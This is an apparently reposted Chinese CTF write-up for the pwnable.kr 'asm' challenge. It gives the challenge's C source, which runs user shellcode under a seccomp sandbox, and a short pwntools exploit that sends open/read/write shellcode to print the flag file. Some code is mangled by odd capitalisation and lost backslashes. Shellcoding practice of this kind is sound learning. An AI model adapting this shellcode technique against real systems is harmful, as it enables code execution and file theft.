脚本宝典收集整理的这篇文章主要介绍了asm,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
Mommy! I think I know how to make shellcodes
ssh asm@pwnable.kr -p2222 (pw: guest)
源码如下:
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <Sys/mman.h> #include <seccomp.h> #include <sys/PRctl.h> #include <fcntl.h> #include <unistd.h> #define LENGTH 128 void sandbox(){ scmp_filter_ctx ctx = seccomp_inIT(SCMP_ACT_KILL); if (ctx == NULL) { printf("seccomp errorn"); exit(0); } seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(oPEn), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); if (seccomp_load(ctx) < 0){ seccomp_release(ctx); printf("seccomp errorn"); exit(0); } seccomp_release(ctx); } char stub[] = "x48x31xc0x48x31xdbx48x31xc9x48x31xd2x48x31xf6x48x31xffx48x31xedx4dx31xc0x4dx31xc9x4dx31xd2x4dx31xdbx4dx31xe4x4dx31xedx4dx31xf6x4dx31xff"; unsigned char filter[256]; int main(int argc, char* argv[]){ setvbuf(stdout, 0, _IONBF, 0); setvbuf(stdin, 0, _IOLBF, 0); printf("Welcome to shellcoding practice challenge.n"); printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.n"); printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.n"); printf("If this does not challenge you. you should play 'asg' challenge :)n"); char* sh = (char*)mmap(0x41414000, 0X1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0); memset(sh, 0x90, 0x1000); memcpy(sh, stub, strlen(stub)); int offset = sizeof(stub); printf("give me your x64 shellcode: "); read(0, sh+offset, 1000); alarm(10); chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use syMLink in /tmp sandbox(); ((void (*)(void))sh)(); return 0; }
写一个orw就行
exp如下:
From pwn import * context.Arch = 'amd64' context.os = 'linux' context.LOG_level = 'debug' io = ssh(host = 'pwnable.kr', user = 'asm', password = 'guest', port = 2222) p = io.connect_remote('localhost', 9026) shellcode = shellcraft.open('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong', 0) shellcode += shellcraft.read(3, 0x41414900, 0x100) shellcode += shellcraft.write(1, 0x41414900, 0x100) shellcode = asm(shellcode) p.recvuntil('shellcode: ') p.send(shellcode) p.interactive()
以上是脚本宝典为你收集整理的asm全部内容,希望文章能够帮你解决asm所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。